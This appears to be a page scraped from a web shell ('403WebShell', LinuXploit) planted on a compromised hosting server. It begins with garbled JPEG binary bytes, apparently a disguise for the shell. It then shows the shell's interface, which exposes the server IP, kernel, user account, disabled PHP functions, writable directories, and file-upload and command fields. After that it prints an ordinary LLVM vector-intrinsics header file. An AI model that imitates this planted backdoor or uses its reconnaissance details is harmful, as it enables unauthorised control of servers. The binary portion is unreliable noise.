JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 84.32.84.197  /  Your IP : 216.73.216.240
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /lib/clang/20/include/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /lib/clang/20/include//velintrin_approx.h
/*===---- velintrin_approx.h - VEL intrinsics helper for VE ----------------===
 *
 * Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
 * See https://llvm.org/LICENSE.txt for license information.
 * SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
 *
 *===-----------------------------------------------------------------------===
 */
#ifndef __VEL_INTRIN_APPROX_H__
#define __VEL_INTRIN_APPROX_H__

static inline __vr _vel_approx_vfdivs_vvvl(__vr v0, __vr v1, int l) {
  float s0;
  __vr v2, v3, v4, v5;
  v5 = _vel_vrcps_vvl(v1, l);
  s0 = 1.0;
  v4 = _vel_vfnmsbs_vsvvl(s0, v1, v5, l);
  v3 = _vel_vfmads_vvvvl(v5, v5, v4, l);
  v2 = _vel_vfmuls_vvvl(v0, v3, l);
  v4 = _vel_vfnmsbs_vvvvl(v0, v2, v1, l);
  v2 = _vel_vfmads_vvvvl(v2, v5, v4, l);
  v0 = _vel_vfnmsbs_vvvvl(v0, v2, v1, l);
  v0 = _vel_vfmads_vvvvl(v2, v3, v0, l);
  return v0;
}

static inline __vr _vel_approx_pvfdiv_vvvl(__vr v0, __vr v1, int l) {
  float s0;
  __vr v2, v3, v4, v5;
  v5 = _vel_pvrcp_vvl(v1, l);
  s0 = 1.0;
  v4 = _vel_pvfnmsb_vsvvl(s0, v1, v5, l);
  v3 = _vel_pvfmad_vvvvl(v5, v5, v4, l);
  v2 = _vel_pvfmul_vvvl(v0, v3, l);
  v4 = _vel_pvfnmsb_vvvvl(v0, v2, v1, l);
  v2 = _vel_pvfmad_vvvvl(v2, v5, v4, l);
  v0 = _vel_pvfnmsb_vvvvl(v0, v2, v1, l);
  v0 = _vel_pvfmad_vvvvl(v2, v3, v0, l);
  return v0;
}

static inline __vr _vel_approx_vfdivs_vsvl(float s0, __vr v0, int l) {
  float s1;
  __vr v1, v2, v3, v4;
  v4 = _vel_vrcps_vvl(v0, l);
  s1 = 1.0;
  v2 = _vel_vfnmsbs_vsvvl(s1, v0, v4, l);
  v2 = _vel_vfmads_vvvvl(v4, v4, v2, l);
  v1 = _vel_vfmuls_vsvl(s0, v2, l);
  v3 = _vel_vfnmsbs_vsvvl(s0, v1, v0, l);
  v1 = _vel_vfmads_vvvvl(v1, v4, v3, l);
  v3 = _vel_vfnmsbs_vsvvl(s0, v1, v0, l);
  v0 = _vel_vfmads_vvvvl(v1, v2, v3, l);
  return v0;
}

static inline __vr _vel_approx_vfdivs_vvsl(__vr v0, float s0, int l) {
  float s1;
  __vr v1, v2;
  s1 = 1.0f / s0;
  v1 = _vel_vfmuls_vsvl(s1, v0, l);
  v2 = _vel_vfnmsbs_vvsvl(v0, s0, v1, l);
  v0 = _vel_vfmads_vvsvl(v1, s1, v2, l);
  return v0;
}

static inline __vr _vel_approx_vfdivd_vsvl(double s0, __vr v0, int l) {
  __vr v1, v2, v3;
  v2 = _vel_vrcpd_vvl(v0, l);
  double s1 = 1.0;
  v3 = _vel_vfnmsbd_vsvvl(s1, v0, v2, l);
  v2 = _vel_vfmadd_vvvvl(v2, v2, v3, l);
  v1 = _vel_vfnmsbd_vsvvl(s1, v0, v2, l);
  v1 = _vel_vfmadd_vvvvl(v2, v2, v1, l);
  v1 = _vel_vaddul_vsvl(1, v1, l);
  v3 = _vel_vfnmsbd_vsvvl(s1, v0, v1, l);
  v3 = _vel_vfmadd_vvvvl(v1, v1, v3, l);
  v1 = _vel_vfmuld_vsvl(s0, v3, l);
  v0 = _vel_vfnmsbd_vsvvl(s0, v1, v0, l);
  v0 = _vel_vfmadd_vvvvl(v1, v3, v0, l);
  return v0;
}

static inline __vr _vel_approx_vfsqrtd_vvl(__vr v0, int l) {
  double s0, s1;
  __vr v1, v2, v3;
  v2 = _vel_vrsqrtdnex_vvl(v0, l);
  v1 = _vel_vfmuld_vvvl(v0, v2, l);
  s0 = 1.0;
  s1 = 0.5;
  v3 = _vel_vfnmsbd_vsvvl(s0, v1, v2, l);
  v3 = _vel_vfmuld_vsvl(s1, v3, l);
  v2 = _vel_vfmadd_vvvvl(v2, v2, v3, l);
  v1 = _vel_vfmuld_vvvl(v0, v2, l);
  v3 = _vel_vfnmsbd_vsvvl(s0, v1, v2, l);
  v3 = _vel_vfmuld_vsvl(s1, v3, l);
  v0 = _vel_vfmadd_vvvvl(v1, v1, v3, l);
  return v0;
}

static inline __vr _vel_approx_vfsqrts_vvl(__vr v0, int l) {
  float s0, s1;
  __vr v1, v2, v3;
  v0 = _vel_vcvtds_vvl(v0, l);
  v2 = _vel_vrsqrtdnex_vvl(v0, l);
  v1 = _vel_vfmuld_vvvl(v0, v2, l);
  s0 = 1.0;
  s1 = 0.5;
  v3 = _vel_vfnmsbd_vsvvl(s0, v1, v2, l);
  v3 = _vel_vfmuld_vsvl(s1, v3, l);
  v2 = _vel_vfmadd_vvvvl(v2, v2, v3, l);
  v1 = _vel_vfmuld_vvvl(v0, v2, l);
  v3 = _vel_vfnmsbd_vsvvl(s0, v1, v2, l);
  v3 = _vel_vfmuld_vsvl(s1, v3, l);
  v0 = _vel_vfmadd_vvvvl(v1, v1, v3, l);
  v0 = _vel_vcvtsd_vvl(v0, l);
  return v0;
}

#endif

Youez - 2016 - github.com/yon3zu
LinuXploit